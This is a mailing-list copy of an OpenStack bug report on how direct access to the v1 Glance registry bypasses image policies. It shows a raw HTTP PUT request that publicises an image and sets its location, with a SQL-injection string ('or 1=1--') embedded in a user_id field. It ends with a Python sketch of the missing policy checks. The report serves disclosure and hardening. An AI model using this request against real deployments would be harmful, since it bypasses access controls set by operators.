[Openstack-security] [Bug 1556023] Re: Direct v1 registry access can bypass Glance's policies
Tristan Cacqueray
tdecacqu at redhat.com
Tue Mar 29 16:14:40 UTC 2016
Since there are no objections, I'm switching this to public and marking
as a hardening opportunity.
** Tags added: security
--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1556023
Title:
Direct v1 registry access can bypass Glance's policies
Status in Glance:
New
Status in OpenStack Security Advisory:
Won't Fix
Bug description:
If a non-admin user can access the registry directly, then they can
bypass Glance's policies.
Here, for example, is a registry request which bypasses both the
policy to mark an image as public, and to set the image location
directly:
PUT /images/37d89430-8bf2-433a-843e-909c752866df HTTP/1.1
Host: 127.0.0.1:9191
Content-Length: 606
Accept-Encoding: gzip, deflate
Accept: application/json
x-auth-token: dc9e09e4954d4b42983784b3c4642bd9
Connection: keep-alive
User-Agent: restfuzz-0.1.0
Content-Type: application/json

{"image": {"status": "active", "deleted": false, "name":
"testpublic", "container_format": "bare", "min_ram": 2147483647,
"disk_format": "qcow2", "id": "37d89430-8bf2-433a-843e-909c752866df",
"owner": "48c21395db63405d94aee1f965615d1c", "min_disk": 2147483647,
"is_public": true, "properties": {"image_type": "snapshot",
"instance_uuid": "7df74ad1-1caf-44ac-8f4b-4313f5fda5ed", "user_id":
"76b4ded518594216832e06c261523074' or 1=1--", "base_image_ref":
"1c8c3ba8-3a2f-4d06-b1ba-ac1791b599d8"}, "size": 6599958588555,
"virtual_size": 6599958588551, "min_disk": 2147483647,
"location":"http://google.com"}}
Note that deployments should firewall the registry off; typical users should only have access to the Glance API endpoint.
However, a user such as a Swift administrator who does not have Glance admin powers but is able to access the 'private' network can bypass Glance's policies.
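As an added illustration (not part of the bug report or of Glance's own code), the following Python models the policy checks that the Glance API layer applies to the request above and that the registry, when reached directly on port 9191, does not. The rule grammar is a simplification of oslo.policy, and the target names publicize_image and set_image_location are assumed to match Glance's policy targets for the two operations named in the report.

```python
import json

# Constructed stand-in for the relevant Glance policy rules (a real
# deployment loads these from policy.json through oslo.policy).
POLICY = {
    "modify_image": "",                 # any authenticated user
    "publicize_image": "role:admin",    # mark an image public
    "set_image_location": "role:admin", # set the image location directly
}

# Image attributes in a PUT body that trigger an extra policy check.
PROTECTED_FIELDS = {
    "is_public": "publicize_image",
    "location": "set_image_location",
}


def rule_allows(rule, context):
    """Evaluate the tiny rule grammar used above: '' or 'role:<name>'."""
    if rule == "":
        return True
    kind, _, value = rule.partition(":")
    return kind == "role" and value in context["roles"]


def required_policies(image_update):
    """Return every policy target an image update must satisfy."""
    targets = ["modify_image"]
    for field, target in PROTECTED_FIELDS.items():
        if field in image_update:
            targets.append(target)
    return targets


def enforce(image_update, context):
    """Return the policy targets the caller is NOT allowed to use.

    An empty list means the update passes the API layer's checks; the
    registry itself performs none of them, which is the reported bypass."""
    return [t for t in required_policies(image_update)
            if not rule_allows(POLICY[t], context)]


# Trimmed copy of the request body from the report (only the relevant fields).
REQUEST_BODY = json.loads('{"image": {"status": "active", "name": "testpublic",'
                          ' "is_public": true, "location": "http://google.com"}}')

if __name__ == "__main__":
    member = {"roles": ["_member_"]}   # constructed non-admin context
    admin = {"roles": ["admin"]}       # constructed admin context
    print(enforce(REQUEST_BODY["image"], member))  # ['publicize_image', 'set_image_location']
    print(enforce(REQUEST_BODY["image"], admin))   # []
```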